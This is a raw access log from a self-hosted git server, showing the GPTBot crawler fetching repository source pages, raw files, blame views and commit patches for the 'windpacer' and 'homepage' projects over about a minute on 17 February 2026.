"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" [Client 74.7.227.38] [Length 10722] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" +[17/Feb/2026:13:20:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10831] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" +[17/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" [Client 74.7.227.38] [Length 10724] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14187] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16463] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15539] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/monthly" [Client 74.7.227.38] [Length 8599] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11958] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10700] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" +[17/Feb/2026:13:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10794] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" +[17/Feb/2026:13:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10155] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:13:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" +[17/Feb/2026:13:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" +[17/Feb/2026:13:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:13:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14292] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" +[17/Feb/2026:13:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15897] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16906] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" +[17/Feb/2026:13:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" +[17/Feb/2026:13:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 14955] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:13:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" +[17/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 13777] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" +[17/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" +[17/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" +[17/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" +[17/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch" [Client 74.7.227.38] [Length 550733] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f.patch" [Client 74.7.227.38] [Length 141606] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83.patch" [Client 74.7.227.38] [Length 1368171] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" +[17/Feb/2026:13:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users" [Client 74.7.227.38] [Length 5447] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:13:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:13:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:13:20:55 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:13:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:13:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" +[17/Feb/2026:13:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 23201] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13866] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/daily" [Client 74.7.227.38] [Length 8366] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" +[17/Feb/2026:13:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" +[17/Feb/2026:13:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" +[17/Feb/2026:13:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" +[17/Feb/2026:13:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" +[17/Feb/2026:13:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.atom" [Client 74.7.227.38] [Length 2476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.atom" [Client 74.7.227.38] [Length 10256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 11643] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" +[17/Feb/2026:13:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" +[17/Feb/2026:13:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 11642] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:21:05 +0000] - 200 200 